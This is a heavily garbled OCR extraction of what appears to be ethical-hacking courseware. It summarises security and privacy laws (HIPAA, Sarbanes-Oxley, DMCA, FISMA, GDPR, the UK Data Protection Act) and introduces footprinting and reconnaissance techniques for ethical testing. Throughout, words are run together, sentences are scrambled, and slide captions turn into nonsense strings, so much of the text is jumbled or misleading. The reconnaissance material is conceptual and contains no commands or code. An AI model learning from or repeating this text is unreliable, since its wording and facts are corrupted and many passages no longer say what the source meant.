who doesbusiness electronically
must use the same
healthcare transactions,
codesets,andidentifiers.
Rule
Privacy
TheHIPAAPrivacy Ruleestablishesnationalstandardsto protectpeople’s medical
records
andother personal
healthinformation andapplies to healthplans, healthcare
clearinghouses,
andhealthcare providersthat conductcertain healthcare transactions
electronically. safeguards
The rule requiresappropriate to protect the privacy of
personal healthinformation.It sets limitsandconditionson the uses and disclosures
that may bemadeof suchinformationwithout patient authorization.
Therulealsogives
patientsrights over their healthinformation,including the rightto examine andobtaina
copy of their healthrecordsandto request corrections.

SecurityRule
TheHIPAASecurity Ruleestablishes nationalstandardsto protectindividuals’
electronic
personalhealthinformationthat is created,received,used, or maintainedbya covered
entity.The Security Rulerequiresappropriate administrative,physical,
and technical
safeguards to ensure the confidentiality, integrity,and securityof electronically
healthinformation.
protected
Employer
IdentifierStandard
TheHIPAArequires that eachemployer
hasa standardnationalnumberthat identifies
themon standard
transactions.
NationalProvider
Identifier (NPI)
Standard
TheNationalProviderIdentifier (NPI) is a HIPAAAdministrativeSimplification
Standard
The NPI is a uniqueidentificationnumberassigned to coveredhealthcare providers.
Coveredhealthcare providers andall healthplans andhealthcare clearinghousesmust
use the NPisin the administrative andfinancialtransactions adopted underHIPAA.The
NPIis a 10-position,intelligence-free numeric identifier(10-digit
number). Thismeans
that the numbersdo not carry other informationabouthealthcareproviders, suchas
the state in whichtheylive or theirmedicalspecialty.
Enforcement
Rule
The HIPAA EnforcementRule contains provisions relatingto compliance
and
as well as the imposition
investigation, penalties
of civilmonetary forviolationsofthe
HIPAA
AdministrativeSimplification
Rulesandprocedures
for hearings.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SarbanesOxley
Act (SOX)

in
{@Enacted 2002,
the Acts designed
SarbanesOxley to protect
investors
bytheand
andthepublic increasingaccuracy

TideT
| Pub
poe
company
penn
AeountingOveright
VE_—
|
‘Tie Commision Reources ad atonty

‘Tile Auterindependence
‘Title
VIE Stes anaRopar

‘Title
1 compartesponataty
Serer
‘nieve end

lo
| Eohaeed
antl Dadonuet
White
Pasty
‘Title
IK
Enhancem Ctr crime

TitloV
| Anacostia
rae
‘tle Corporateets

Sarbanes Oxley Act (SOX)

Source:https://www.sec.gov
Enactedi n 2002,the Sarbanes-Oxley
Act aims to protectthe public andinvestors byincreasing
the accuracyand reliabilityof corporatedisclosures. This act does not explain how an
organizationmust store recordsbut describes the recordsthat organizations must store and
the durationof their storage.The Act mandatedseveralreformsto enhance corporate
responsibility,
enhancefinancialdisclosures,
andcombatcorporate andaccounting fraud.
Thekeyrequirements andprovisionsof SOXare organized into 11titles:
‘Title1: PublicCompany Accounting Oversight Board(PCAOB): Title | consistsof nine
the PublicCompany
sections and establishes Accounting Oversight Boardto provide
independent
oversight
of publicaccounting
firms that provide
audit services
("auditors").
It also creates a central oversight
board taskedwith registering
audit
services, definingthe specific processesand procedures for complianceaudits,
inspectingand policingconductandquality control,and enforcing
compliance
with the
specific
mandatesof SOX.
Title Ul: Auditor Independence:
Title I consists of nine sections and establishes
standardsfor externalauditorindependence to limit conflicts
of interest. It also
addressesn ew auditor approval requirements,audit partnerrotation,and auditor
reportingrequirements. It restricts auditing
companiesfrom providing non-audit
services (such
as consulting)
for the sameclients,
Responsibility:
TitleIl: Corporate TitleIll consistsof eight
sectionsand mandates
that
senior executives take individual responsibility
for the accuracy and completeness
of
financial
corporate reports.It definesthe interaction betweenexternalauditorsand
audit committees and specifies
corporate the corporate responsibility
officers’ for the
andvalidity
accuracy of corporatefinancialreports. limits on the
it enumerates specific

ical andCountermensores
Mackin ©by E-Comel
Copyright
 behaviorsof corporate officers anddescribes specific forfeitures of benefitsandcivil
penalties for non-compliance.
Title IV: EnhancedFinancialDisclosures: Title IV consistsof nine sections.It describes
enhancedreporting requirements forfinancial transactions, including off-balance-sheet
transactions, pro-forma figures, and the stocktransactions of corporate officers.It
requiresinternalcontrolsto ensure theaccuracy offinancial reportsanddisclosures and
mandatesbothauditsandreportso n thosecontrols.It alsorequires timely reporting of
materialchanges i n financial conditions andspecific enhanced reviews of corporate
reportsbytheSECor its agents,
Title V: Analyst Conflictsof Interest:TitleV consistsof onlyone section that discusses
the measures designed to help restore investor confidence i n the reporting of securities
analysts. It definesthe codeof conductfor securities analysts and requiresthat they
discloseany knowableconflictsof interest.
Title VI: Commission Resourcesand Authority: Title VI consistsof four sections and
defines practices to restore investor confidence in securitiesanalysts. It alsodefines the
SEC's authority to censure or bar securities professionals from practice anddefinesthe
conditionsto bara personfrompracticing as a broker, advisor, or dealer.
Title Vil: Studiesand Reports: Title Vil consists of five sections and requiresthe
Comptroller Generaland the Securitiesand Exchange Commission (SEC) to perform
various studiesandto report theirfindings. Therequired studies andreportsinclude the
effectsof the consolidation of public accounting firms,the roleof creditratingagencies
i n the operation of securities markets, securitiesviolations, enforcement actions,and
whetherinvestment banksassistedEnron, GlobalCrossing, andothersto manipulate
earningsandobfuscate true financial conditions.
Title VIII: Corporate and CriminalFraudAccountability:Title Vill,alsoknownas the
“Corporate andCriminalFraudAccountability Actof 2002," consistsof seven sections.It
describes specific criminalpenalties for the manipulation, destruction, or alterationof
financial recordsor interferencewith investigations, while also providing certain
protections for whistle-blowers.
Title IX: White-Collar-Crime Penalty Enhancement: Title IX,alsoknownas the "White
CollarCrimePenalty Enhancement Act of 2002,― consistsof six sections. Thistitle
increases the criminalpenalties associated with white-collarcrimes and conspiracies.It
recommends strongersentencing guidelines and specifically addsfailureto certify
corporate financialreports as a criminaloffense.

Title X: Corporate TaxReturns:TitleX consistsof one section that states that the Chief
Executive Officer
Title XI: Corporate tax
shouldsignthecompany return.
FraudAccountability: Title XI consistsof seven sections. Section
1101recommends the following name for the title: “Corporate FraudAccountability Act
of 2002.― It identifies corporate fraudand records tampering as criminaloffensesand
joins thoseoffensesto specific penalties. It also revises sentencing guidelines and
strengthens penalties. Doingso enablesthe SECto temporarily freeze “large―
or
“unusual―
transactionsor payments,

Module ical andCountermensores

Mackin ©by E-Comel
Copyright
 TheDigital Act (DMCA)
Millennium Copyright andthe Federal
InformationSecurity Act (FISMA)
Management
DigitalMillennium
‘The Federal Information Security
CopyrightKet (DMCA) ‘Management Ket (FISMB)
(©T hOMCAIs
e
he a
a United
States copie

Organization ow
Inttetal
Property eration (WFO)
aw that (© Fst provies
cies at
comprehensive

sp Fel
ramet fo ensuing

The Digital
Millennium Act (DMCA)
Copyright
Source:https://www.copyright.gov
‘The
DMCAis an American copyright
lawthat implements
two 1996treaties from the World
IntellectualProperty
Organization (WIPO): the WIPO CopyrightTreatyand the WIPO
Performances and PhonogramsTreaty. UStreatyobligations,
In orderto implement the DMCA
defineslegalprohibitions
againstcircumvention of the technological
protectionmeasures
employed bycopyright
owners to protect their works,
andagainstthe removalor alterationof
copyrightmanagementinformation.TheDMCAcontainsfivetitles

|:
‘Title WIPOTREATY IMPLEMENTATION:
makescertain technicalamendments
references
Title | implements the WIPOtreaties. First,
to US law i n order to provide
andlinksto the treaties. Second,
the appropriate
it creates two new prohibitions
it

in Title 17
of the U.S.Code—one on circumvention of the technological measures used by
copyrightowners to protecttheir works and one on tampering with copyright
management information—andaddscivil remediesandcriminalpenalties for violating
theprohibitions,
TitleI: ONLINECOPYRIGHT INFRINGEMENT LIABILITYLIMITATION:TitleIl of the DMICA
addsa new section 512 to the Copyright
Act to create four new limitationson liability
for copyright infringement
byonlineservice providers. A service providerbasesthese
limitationson the following
four categories
of conduct:
©.

©.
Transitory
communications
System
caching
Theuser-directed of information
storage or networks
on systems

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Information
locationtools
New section 512 also includesspecial rules concerningthe application
of these
limitationsto nonprofit
educationalinstitutions,
TitleIl: COMPUTER
MAINTENANCE TitleIl ofthe DMCAallowstheowner
ORREPAIR:
cofa copy of a program to makereproductions or adaptations whennecessaryto use the
programi n conjunction with a computer. Theamendment permitsthe owner or lessee
of a computer to makeor to authorizethe making of a copy of a computer program i n
thecourse of maintaining or repairingthat computer

Title IV: MISCELLANEOUS PROVISIONS: Title IV contains six miscellaneous provisions.

Thefirst provision announces the Clarificationof the Authority of the Copyright
Office;
the secondgrantsexemptionfor the making of “ephemeral recordings―;
the third
promotes studybydistanceeducation; the fourth provides an exemption for Nonprofit
libraries and Archives; the fifth allowsWebcasting Amendmentsto the Digital
PerformanceRighti n SoundRecordings, and,finally,the sixth provision addresses
concerns about the ability of writers,directors andscreen actors to obtainresidual
payments for the exploitationof motion pictures i n situations wherethe producer is no
longer ableto makethesepayments.
Title
V:
PROTECTION
VesselHull Design
the original
OFCERTAIN ORIGINAL
ProtectionAct (VHDPA).
designs
DESIGNS: TitleV of the DMCA,
Thisact creates a new system
entitlesthe
for protecting
of certain usefularticlesthat make the articleattractive or
distinctivein appearance.Forpurposes of the VHOPA, “useful
articles―
are limitedto the

the
hulls(includingdecks) ofvessels
Federal Information Security
‘The
n o longer

Management
than200feet
Act (FISMA)
Source:httpsi//esre.nist.gov
TheFederalInformationSecurity
Management to produce
Act of 2002was enacted severalkey
standardsand guidelines
security required
byCongressionallegislation.
TheFISMAprovidesa
comprehensive
frameworkfor ensuringthe effectiveness
of informationsecuritycontrolsover
informationresources that supportfederal operations and assets. It requireseachfederal
agencyto develop, document, and implement
an agency-wideprogramto provide information
security for the informationandinformationsystems
that supportthe operations andassetsof.
the agency,including thoseprovided or managedbyanotheragency,contractor, or another
source, TheFISMAframework includes:
=
Standards
for categorizing bymissionimpact
informationandinformationsystems
+
Standardsfor the minimum for informationand information
securityrequirements
systems
Guidancefor selecting
appropriate controlsfor informationsystems
security
Guidancefor assessingsecurity and determining
controlsi n informationsystems their
effectiveness
Guidanceforthe security
authorizationofinformation
systems

ical andCountermensores
Mackin ©by E-Comel
Copyright
 GeneralDataProtectionRegulation
(GDPR)
(©
.GoPR
regulation
eloballyinto
on
May
25,one
ofthe
was

most
privacy
put
security
laws
eect 2018and stringent and

(©
wit
levy
TheGOR harsh
tensofmilonsoferos
i nesagunet
thosewho violate and secu standard,
ts privacy

GDPR Data ProtectionPrinciples

with penalties
reaching

Storage
tation: datong
Intenty
cWnfdentiaity
specied
purpose
Youmayoly store personaly

appropriate
andconfident: Processing
entivng
mustbedonein sch
by using encryption
( eg.
foras
way to ensve
forthe
as necessary

ecu Integy, nd

1
responsible
demonstrating
GPR
compliance
Thedatacontrol
Accountabity: for wihaltheseences

GeneralDataProtectionRegulation
(GDPR)
Source:https://adpr.eu
The GeneralDataProtectionRegulation (GDPR) is one of the most stringentprivacy and
security lawsglobally.
Though it was drafted andpassed bythe European Union(EU), it imposes
obligations onto organizationsanywhere, so longas theytargetor collectdata related to
people i n the EU.Theregulation
finesagainst
was put into
effect GDPR
on May
thosewhoviolate its privacyand security
25,2018.The
standards,
will levy
with penalties
reaching
harsh
tens

of millionsofeuros.
WiththeGDPR, Europe signifies whenmore people
its firmstanceon dataprivacyandsecurity
their data with cloud services, and breachesare a dailyoccurrence. The
are entrusting
regulation
itself is extensive,far-reaching, lighto n specifics,
and relatively making GDPR
compliancea daunting prospect,particularlyfor smallandmedium-sized (SMES).
enterprises
Data Protection Principles
GDPR
‘The
GDPRincludesseven protection principles
andaccountability outlined i n Article5.1-2:
=
Lawfulness, andtransparency:
fairness, must be lawful,
Processing fair,andtransparent
to thedatasubject.

Purpose limitation: You must process data for the legitimate

purposes specified
explicitly
to the datasubjectwhenyoucollectedit.
Dataminimization:Youshouldcollectand processonlyas muchdata as necessary
for
specified,
the purposes
Accuracy:
Youmust keep
personal
dataaccurateandup to date.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Storage limitation:You may onlystore personally identifying
data for as longas
necessaryfor the specified
purpose
Integrity and confidentiality:
Processingmust be done i n sucha way as to ensure
appropriate security,
integrity, (e.g.,
andconfidentiality byusingencryption).
Accountability: Thedatacontrolleris responsible
for demonstratingGDPR compliance
withall of theseprinciples.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DataProtectionAct 2018(DPA)

(© The
P a 2018s
lawnthe UK protects
individuals
of
|a: TheoP
processing
‘the
parca by
personal
at,
once
n

i nt
andthe
Protection data
updates replacesData
tobe
or
another
1 personal
Requing
Towanda,
consent
processed
basedon thedata

25
Act 1908 subject’ specie
and came effect on May,2018 sts

Confringeghts
on thedata subject
to

to to
ian

cormecton
with
the
act make provisonforthe regula
of information reiting individualto
onal dase reac

directConfring
functions leormation

Commissioner's
funeions
preision i n
‘make the

to fora
underspeteegulations Commisionr ging toler f that
relatingto information,make provision e e responaityfo mantra
code
‘marketing of practiceand connectedpurposes tore thew
prowsions

Data Protection Act 2018 (DPA)

Source:https://www.legislation.gov.uk
DPA2018setsout the framework
‘The fordataprotection law in theUK.It updates andreplaces
the Data Protection Act 1998and came into effecto n 25 May,2018. It was amendedon 01
January, 2021byregulations underthe European Union (Withdrawal) Act 2018to reflectthe
UK'sstatusoutsidethe EU.
TheDPAis a n act to makeprovision for the regulationof the processingof informationrelating
to makeprovisioni n connection withtheInformation
to individuals; Commissioner's functions
underspecific regulationsrelatingto information;to makeprovisionfor a directmarketing code
of practice,andconnectedpurposes. The DPAalsosetsout separatedata protection rulesfor
lawenforcementauthorities,extendsdata protection to some other areas suchas national
securityanddefense, andsetsout the InformationCommissioner's functionsandpowers,
Protectionof personal data
1, The DPAprotects individualsconcerningthe processingof personaldata,i n particular
by:
a . Requiring personal data to be processed lawfully fairly,basedon the data
and
subject's
consent or anotherspecified
basis,
Conferring
rightson the data subject
to obtaininformation
aboutthe processing
of
personal
dataandto requireinaccuratepersonal
datato berectified,and
Conferring
functions on the giving the holderof that office
Commissioner,
responsibility
to monitor andenforcetheir provisions.
2. Whencarrying out functionsunderthe GDPR, the applied GDPR,
and this Act,the
Commissioner must regard the importance of securingan appropriatelevel of
protectionfor personal data, takingaccount of the interests of data subjects,
andothers,
controllers, andmatters ofgeneralpublicinterest.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 1
CyberLaw in DifferentCountries CEH
Pr ne‘The
ant
radon
USE 15 205-127) epaego
gor
Fenntai het spears
nto sates
ey
rot rere

At of 974
ct

epee
pelwmunatee
gor
go

CyberLaw in DifferentCountries (Cont'd)

sey comico

e um Tete Soi
te ee Cet 8

7
‘HeheAme eh apr 87 opufmoniped
nen

08
Module 89
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 CyberLaw in DifferentCountries (Cont'd) 413
H
Pe
Dre
aly
Japan
rl

(aw Management
caderie
The ademarkw
(22.3400)
18
Mo 127 957),copy Buss
peewee
toe/hem or
oryCentSC. 398 640 radon oan ie
poe tea gees

Singapore
fe
SouthAiea
Compt
Traders
Corot
At
18
178
85,
oso anee ne
esinncpecoze
row

No.
SouthKorea
Cera
Industria en

Core ae 006/808
At 386
rt at
epenccyreceke
rose

repent
gor
Belgium

Beal medion
Hong
Kone
Unatered
Arie 1390 ae La
ore te irton tem epee
pene
domstaine

ancongoeh

Law in DifferentCountries
Cyber
Cyberlaw
or Internet law refersto
any lawsthat dealwith protectingthe Internetandother
onlinecommunication technologies.
Cyberlawcovers topicssuchas Internetaccessandusage,
privacy,freedomof expression,and jurisdiction.
Cyber laws provide a n assurance of the
integrity, privacy,and confidentiality
security,
Theselawshavebecomeprominent
organizations.
the world. Cyber laws vary byjurisdiction
of
informationi n bothgovernmental and private
dueto the increasein Internetusagearound
and country, so implementing them is quite
challenging.
Violating
theselawsresultsin punishments
rangingfromfinesto imprisonment.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module Summary

Thismedul Giacusedelements
ofinkarmatonsect information
secur tacts
413
H
andinfomationwarare
Ik cused ever kl chin methodology,
Ts, andlosin detail

Ieaeodscusted
acing nd
concepts,types, phases

ethical
Racines ls andotherpertinentifomationi n deta
cessed information
scury contolsucha s defnsesin-depth,
rk management,

module
‘Tt endedwith2 deta discussionofvarious information
secuntyact and

Thenextmod wl ontodetaabouth owattackers

as well
as na
tical hackers

Module Summary
Thismodulehasdiscussed elements ofinformation security,information attacks,
security and
informationwarfare.It hascoveredcyber kill chainmethodology, TTPs,and loCsi n detail. It
also discussedhacking concepts,types,andphases. Thismoduleclosely examinedethical
hacking conceptssuchas its scope and limitationsandthe skillsof an ethicalhacker.It also
covered thetopicofinformation securitycontrolssuchas defense-in-depth, riskmanagement,
cyberthreat intelligence,
threat modeling, incident management process, and Al and ML.
Finally,
this moduleendedwith a detaileddiscussion of various informationsecurity acts and
laws.
The next modulewill examine how attackers,
as well as ethical hackersand pen testers,
perform
footprinting
to collect
information
about
their targetbeforean attackor audit

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ; 1 0100
10141 1940101 1
©.
10101 1, 10101101,10
01101
cd
01.010104.-1
104

=oa
“e
401010a
i)14¢ T
P

|
Certified Ethical Hacker

Module02:
ola Ke
ioleldinliiare aler-y
lavemsx-rere)alalelissxe
 Module Objectives

Understanding
FootprintTrough

WebteFotprintng
Understanding a ndEmaFootrmng
Networking
WebSenicesa ndSocal Stes

Understanding
WHOIS, andNetworkFooting
ONS,

LUndectanding
Footer Trough

Understanding
Socal
Eneneting

ToolandCounermesutes
oferentFotpritng

Module Objectives
is thefirst stepi n the evaluation
Footprinting of the security of the IT infrastructureof a
posture
targetorganization. Through footprintingand reconnaissance,one can gatherm aximum
informationabout a computer systemor a networkandabout any deviceconnectedto that
network.In other words,footprinting provides profile
a security blueprint foran organization
andshouldbeundertakeni n a methodological
manner.

to footprinting
Thismodulestartswith an introduction and provides
concepts insights
into the
footprinting
methodology.
The module endswith an overview of footprinting
tools and
countermeasures

of
At theend this module,
youwill beableto:
=

=
Describe
concepts
footprinting
Performfootprinting
through
searchengines andusingadvancedGoogle
hacking
techniques
footprinting
Perform through
web services andsocialnetworking
sites
Performwebsitefootprinting
andemailfootprinting
DNS,
PerformWhois, andnetworkfootprinting
Performfootprinting
through
socialengineering
footprinting
Usedifferent tools
footprinting
Apply bestpractices

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module Flow

Footprinting
Tools

Footprinting
Concepts
Ethical
legal
nature
hacking
is
to in
security
organizatio
andconductedevaluate
the
ITinfrastructurewith their consent. Footprinting,
hacking.
about a target,i s thefirststepi n ethical
ofa target
wherea n attackertries to gather
information
phase
Thisstepacts as a preparatory forthe
attacker,
as as easily into
whoneedsto gather much
thetargetnetwork
informationpossibleto findwaysto intrude

youwith footprinting,
Thissectionaims to familiarize whyitis necessary,
andits objectives,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 What is Footprinting?
Footpinting
network
‘target any
t o identify2
is the fst stepof atackon i n which
informationsystems
various ways to intade int thesystem
an attacker
collet information
about

typesoft
Obtained
in | of Information Tootprinting Objective Footprinting

Whatis Footprinting?
essentialaspectof footprinting
‘An is identifying
the level of risk associatedwith the
organization’s
publiclyaccessibleinformation. thefirst stepi n ethicalhacking,
Footprinting,
of
footprinting, a
refersto the processcollectinginformationabout targetnetworkanditsenvironment. Using
you can find a numberof opportunities to penetrate and assessthe target

organization's
network.
After you completethe footprinting
process i n a methodological
manner, you will obtainthe
blueprintofthesecurityprofile Here,theterm “blueprint―
ofthe targetorganization. refersto
profile
the unique system of thetargetorganization acquired
byfootprinting,
is no single
‘There methodology for footprinting,as informationcan be tracedi n a numberof

ways.However, the activityi s important, as youneedto gatherallthe crucialinformation about

the targetorganization beforebeginning the hackingphase.
For this reason, footprinting needs
to be carried out i n an organized manner. The information gathered i n this stephelps in
uncovering vulnerabilitiesexisting i n the targetnetworkand i n identifying different ways of

‘Types
these
exploiting vulnerabilities
of Footprinting
can be categorized
Footprinting into passivefootprinting
andactive footprinting,
‘=
PassiveFootprinting
Passivefootprinting involvesgatheringinformationabout the targetwithout direct
interaction. It is mainly usefulwhenthe informationgatheringactivities are not to be
detectedbythe target.Performing passivefootprinting difficult,
is technically as active
traffic is not sent to the target froma hostor anonymous hostsor services
organization

ical andCountermensores
Mackin ©by E-Comel
Copyright
over the Internet.Wecan onlycollectarchivedandstoredinformation
aboutthetarget
usingsearchengines,socialnetworking
sites,andso on.

Passivefootprinting
techniques
include
© Finding through
information searchengines
Finding Domains(TLDs)
the Top-level of a targetthrough
and sub-domains web

Collecting
location on the targetthrough
information webservices
Performing
people using
search networking andpeople
social sites searchservices
Gathering
financialinformationaboutthe targetthrough financialservices
Gathering
infrastructuredetailsof the through
targetorganization jobsites
Collecting
informationthrough
deep
anddarkweb footprinting
theoperating
Determining i n use bythe target
systems organization

Performing
competitive
intelligence
Monitoring
the targetusingalert services
Gathering
informationusinggroups,forums, blogs,
and NNTPUsenetnewsgroups
Collecting
informationthrough
socialengineeringon socialnetworking
sites

information
Extracting aboutthetargetusingInternetarchives
Gathering
informationusingbusiness profile
sites
Monitoring
websitetrafficof the target
©. Tracking
of
theonlinereputationthe target
ActiveFootprinting
Active footprinting involves gathering informationabout the target with direct
interaction. In active footprinting,
the targetmay recognize the ongoing information
gathering process,as we overtly interact with the targetnetwork.Activefootprinting
requires more preparation thanpassivefootprinting,as it may leavetracesthat may alert

the
target organization,
footprinting
Active techniques
include
© Querying
publishedname servers of the target,

Searching
for digital
files
websitelinksandgathering
Extracting wordlistsfromthe targetwebsite
metadata
Extracting ofpublisheddocuments andfiles
websiteinformation
Gathering usingweb spidering andmirroringtools,
Gathering
informationthrough tracking
email

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Harvesting
email
Whois
lookup
Perforrning
lists

Extracting
DNSinformation
Performing
traceroute analysis

Performing
socialengineering
Information Obtained in Footprinting
The major objectivesof footprinting
include collecting
the network information,
system
Information,
and organizational
informationof the target.Byconducting
footprinting
across
differentnetworklevels,you can gaininformationsuchas networkblacks, specific
IP addresses,
employee and so on. Suchinformation
details, can helpattackersin gainingaccessto sensitive
dataor performingvarious attackson the target
network.
*
Information:Suchinformationabout an organization
Organization is availablefrom its
youcan querythe target’s
website.In addition,
andobtainvaluableinformation.
domain
nameWhois
againstthe database

Theinformation
collected
includes:
details (employee
Employee designations,
names, contact addresses, and work
experience)
Addresses andmobile/telephone
numbers
Branchandlocation details
Partnersof the organization
Weblinksto othercompany-related
sites
Background
of the organization

Web
technologies
Newsarticles,
pressreleases,
andrelateddocuments
Legal
documents
relatedto the organization
Patentsandtrademarks relatedto the organization
Attackerscan access organizational
informationanduse suchinformationto identify key
personnel andlaunchsocialengineeringattacksto extractsensitivedataaboutthe entity.
Network Information: You can gathernetwork information by performing
Whois
analysis,
database andso on,
trace routing,
Theinformation
collectedincludes:
Domainandsub-domains
Networkblocks
Networktopology,
trustedrouters,andfirewalls

ical andCountermensores
Mackin ©by E-Comel
Copyright
 IPaddresses
ofthereachable
systems

Whois records
DNSrecordsandrelatedinformation
System Information: You can gather systeminformation byperforming network
footprinting,
DNSfootprinting,
websitefootprinting,
emailfootprinting,
andso on.
Theinformationcollectedincludes:

Web server05
>

©
ofweb
Location

Publiclyemail
servers
available addresses
© Usernames,
passwords,
andso on,
Objectives
of Footprinting
To builda hacking attackers
strategy, needto gather
informationaboutthetargetorganization's
network.They then use suchinformationto locatethe easiest way to break through the
organization's
security
it easyto gather
process.
perimeter.
informationaboutthe target methodolog
thefootprinting
Asmentionedpreviously,
organization;
this plays
makes
a vital role i n the hacking

helps
Footprinting to
=
Know Security Posture:Performing footprinting
on the targetorganization
gives the
complete profileof the organization's posture.Hackerscan then analyze
security the
reportto identifyloopholesin the security
postureof the targetorganization
andbuild a
hacking
planaccordingly.
Reduce FocusArea: Byusinga combinationof toolsandtechniques, attackerscan take
unknownentity(forexample,
‘an XYZOrganization)andreduceit to a specificrange of
domainnames,networkblocks,
to the Internet,
andindividualIP addresses
as well as manyotherdetailspertaining
ofsystems
to its securitydirectly
connected
posture.
Identify
Vulnerabilities:A detailedfootprint
provides
maximum informationaboutthe
It allowsthe attackerto identify
targetorganization. vulnerabilities
i n the targetsystems
exploits.
to selectappropriate Attackerscan buildtheir own informationdatabaseabout
the securityweaknesses of the targetorganization.Sucha database c an thenhelpin
identifying
theweakestlink i n the organization's
security perimeter.

the Combining
footprinting
attacker techniques
Draw NetworkMap:

of tools
the Tracert
target
presence. Specficially,network
to create diagrammatic
with suchas
representations organization's
allows

it allowsattackersto draw a map or outline of the target

organization's networkinfrastructure to knowabout the actualenvironment that they
are going to break into. A networkmap will depict
the attacker'sunderstandingof the
target's
Internetfootprint.
Thesenetworkdiagrams i n performing
theattacker
can guide
an attack.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Footprinting Threats
Attackersperformfootprinting
as the first step
of any attackon informationsystems.In this
phase, attemptto collectvaluablesystem-level
attackers informationsuchas account details,
operatingsystemandothersoftwareversions, server details,
names,databaseschema and so
on, whichwill be usefulin the hacking
process.
Thefollowing threatsmadepossible
are assorted through
footprinting:
Social Engineering:Withoutusingany intrusion methods,hackersdirectly
andindirectly
through
collect information persuasionandother means. Hackersgather crucial
informationfromwilling
employeeswho are unaware of the hackers’
intent.
SystemandNetworkAttacks:Footprinting enablesa n attackerto perform
systemand
network attacks.Thus, attackerscan gather informationrelatedto the target
organization's
systemconfiguration,
the operating
systemrunningon the machine,and
0 on, attackerscan findvulnerabilities
this information,
Using in the targetsystem and
then exploit
suchvulnerabilities.They
c an then takecontrolof a targetsystem or the
network,
entire
Information Information
Leakage: leakage
posesa threatto anyorganization.
If sensitive
of
on the information
or
fallsinto the handsof attackers,
information an entity
alternatively
use it formonetary
theycan mount an attackbased
benefit,
PrivacyLoss:Through footprinting,
hackersc an accessthe systemsandnetworksof the
organization and even escalatethe privileges resulting
up to adminlevels, i n the lossof

Espionage:
as
a
privacyfor the organization wholeandfor its individualpersonnel.
Corporate Corporate espionage is a centralthreat to organizations, as
oftenaim to attemptto secure sensitivedatathrough
competitors footprinting,Through
this approach,
competitors can launchsimilarproducts i n the market,
alter prices, and
generally
underminethemarketposition of a targetorganization.
BusinessLoss:Footprintingcan havea majoreffecton organizations suchas online
and other e-commerce websitesas well as banking
businesses and finance-related
Billionsofdollarsa re losteveryyeardueto malicious
businesses. attacksbyhackers.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

ootprintingConcepts

Feotprinting
Tools
Footprinting
Countermessures

Footprinting
Methodology
Nowthatyou are familiarwith footprintingconcepts and potentialthreats, we will discuss
the
footprintingmethodology. The footprinting methodology is a procedure for collecting
informationabouta targetorganization fromall availablesources. It involvesgathering
suchas URLs,
informationabout a targetorganization, locations,
establishment details,number
of employees, specificrange of domain names, contact information, andotherrelated
information.Attackerscollectthisinformationfrom publiclyaccessiblesources suchas search

techniques
networking
engines,social sites,
Whois
databases, the andso on. Thissectiondiscusses common
usedto collectinformationaboutthe targetorganization fromdifferentsources,

Footprinting
techniques:
+

through
search
engines,
Footprinting
+

through
web
services
Footprinting
Footprinting
+

social through networking

sites
Websitefootprinting

Email
Whois
footprinting
footprinting
DNS
Network
footprinting
footprinting
Footprinting
through
socialengineering

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Footprinting SearchEngines
through
(@Atachers
use search
enginesto extractinformation

othertypesofadvanced attacks
sjstem
a
about target,
such as employed
technology
platforms,

(arse

Ip
GoogleBingYaroo! Aol. sates °
@®
can complex
(2 Auchers ue advancedsearchoperators
totingfier andsor spec information
avaiable
withthesesearchenginesand
aboutthetarget
create queries

(©Search
ate
alstoater
of accesible
information
engines used fad

provide resources,
eg. sources
to findmajr jb portals
type "topob portals" tha
publ
cital information
youean
aboutthetargetorganization

throughSearchEngines
Footprinting
Search enginesare themain sourcesof key information abouta targetorganization.
Theyplaya
major role i n extractingcriticaldetailsabout a targetfrom the Internet.Searchengines use
automated software, i.., crawlers,to continuously scan active websites
andaddtheretrieved
resultsi n the searchengineindexthat is further storedi n a massive database.Whena user
queriesthesearch engineindex,it returns a listofSearch Engine Results
Pages (SERPs).
These
resultsincludeweb pages,videos, images,and many differentfile typesrankedanddisplayed
according to theirrelevance.Many search enginescan extracttarget information
organization
such as technology platforms,employee details,loginpages,intranet portals, contact
information, andso on. Theinformationhelps the attackeri n performing
socialengineeringand
othertypesof advancedsystem attacks.
A Googlesearchcouldrevealsubmissions to forumsbysecurity
personnel,
disclosing
thebrands
of firewallsor antivirus softwareusedbythe target.Thisinformation
helps
the attackeri n
identifying
vulnerabilitiesi n suchsecurity
controls.
For example,

Microsoft.Browsing
an
consider organization, perhaps
searchengine and pressEnter;this will display
the resultsoften provides
Microsoft.TypeMicrosofti n theSearchboxof
the resultscontaining information
criticalinformationsuchas physical
about
location,
a
contact addresses,services offered,number of employees, andso on, whichmayproveto bea
valuablesource for hacking.
Examples of majorsearchenginesincludeGoogle, Bing, Yahoo,Ask,Aol,Baidu, WolframAlpha,
andDuckDuckGo,
‘Attackers
can use advancedsearchoperators availablewith thesesearchenginesand create
complex informationregarding
queries to find,filter,and sort specific the target.
Searchengines

ical andCountermensores
Mackin ©by E-Comel
Copyright
are alsousedto
“top
find
jobportals―
organization,
other
sources
publicly
accessibleyou
of
to find major jobportals
information.
that provide
Forexample, can type
criticalinformationabout the target

if you find anydeletedpages/information

Asan ethicalhacker, about yourcompanyin SERPs
or
the searchenginecache,you can request the searchengineto remove the pages/information
fromits indexedcache,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Footprinting AdvancedGoogle
Using Hacking
Techniques
(©.
Goople hacking eer totheus ofadvanced
sensitiveox hiddeninformationthat helps
Google earchoperators
attackers i nd vera
foreeatngcomplex
targets
search
queries eatrat
to
(ene Depth
web sap torent Googe (ntl Revs the ret tone wae
Se ‘Geta abe seachyeni

ink]
tothe
tsa poe tat hv tls pte oe ais

tia
tet

ots

{in ame
hat
Googe
Presets nomaton as Aut ests tee

ate etc te eu tothe ween the

Footprinting
UsingAdvanced Google
HackingTechniques
Google refersto the use of advancedGoogle
hacking searchoperators complex
for creating
